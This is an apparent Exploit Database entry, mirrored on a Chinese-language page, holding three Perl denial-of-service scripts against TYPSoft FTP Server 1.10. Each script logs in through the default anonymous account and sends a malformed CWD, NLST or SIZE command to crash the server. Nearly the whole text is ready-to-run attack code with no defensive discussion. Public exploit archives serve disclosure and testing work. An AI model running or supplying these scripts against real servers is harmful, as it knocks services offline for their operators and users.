TYPSoft FTP Server 1.10 – Multiple Denial of Service Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Balazs Makany
  日期： 2012-02-07
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18469/

• #!/usr/bin/perl
  
  # Exploit Title: Typsoft FTP Server DoS CWD command
  # Date: 02/06/2012
  # Author: Balazs Makany
  # Software Link: http://sourceforge.net/projects/ftpserv/
  # Version: 1.10
  # Tested on: Windows 7
  # (does not work on Windows XP)
  #
  # Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
  #
  
  use IO::Socket;
  
  $user = "USER anonymous\r\n";
  $passw = "PASS anonymous@127.0.0.1\r\n";
  $command = "CWD ";
  $dos_input = "."x250;
  $send = "\r\n";
  $socket = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => "$ARGV[0]",
  PeerPort => "$ARGV[1]",
  );
  
  $socket->recv($serverdata, 1024);
  print $serverdata;
  
  $socket->send($user);
  $socket->recv($serverdata, 1024);
  $socket->send($passw);
  $socket->recv($serverdata, 1024);
  $socket->send($command.$dos_input.$send);
  
  
  #!/usr/bin/perl
  
  # Exploit Title: Typsoft FTP Server DoS NLST command
  # Date: 02/06/2012
  # Author: Balazs Makany
  # Software Link: http://sourceforge.net/projects/ftpserv/
  # Version: 1.10
  # Tested on: Windows 7 
  # (does not work on Windows XP)
  #
  # Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
  #
  
  use IO::Socket;
  
  $user = "USER anonymous\r\n";
  $passw = "PASS anonymous@127.0.0.1\r\n";
  $command = "NLST ";
  $dos_input = "/.../.../.../.../.../";
  $send = "\r\n";
  $socket = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => "$ARGV[0]",
  PeerPort => "$ARGV[1]",
  );
  
  $socket->recv($serverdata, 1024);
  print $serverdata;
  
  $socket->send($user);
  $socket->recv($serverdata, 1024);
  $socket->send($passw);
  $socket->recv($serverdata, 1024);
  $socket->send($command.$dos_input.$send);
  
  
  #!/usr/bin/perl
  
  # Exploit Title: Typsoft FTP Server DoS SIZE command
  # Date: 02/06/2012
  # Author: Balazs Makany
  # Software Link: http://sourceforge.net/projects/ftpserv/
  # Version: 1.10
  # Tested on: Windows 7
  # (does not work on Windows XP)
  #
  # Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
  #
  
  use IO::Socket;
  
  $user = "USER anonymous\r\n";
  $passw = "PASS anonymous@127.0.0.1\r\n";
  $command = "SIZE ";
  $dos_input = "/.../.../.../.../.../";
  $send = "\r\n";
  $socket = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => "$ARGV[0]",
  PeerPort => "$ARGV[1]",
  );
  
  $socket->recv($serverdata, 1024);
  print $serverdata;
  
  $socket->send($user);
  $socket->recv($serverdata, 1024);
  $socket->send($passw);
  $socket->recv($serverdata, 1024);
  $socket->send($command.$dos_input.$send);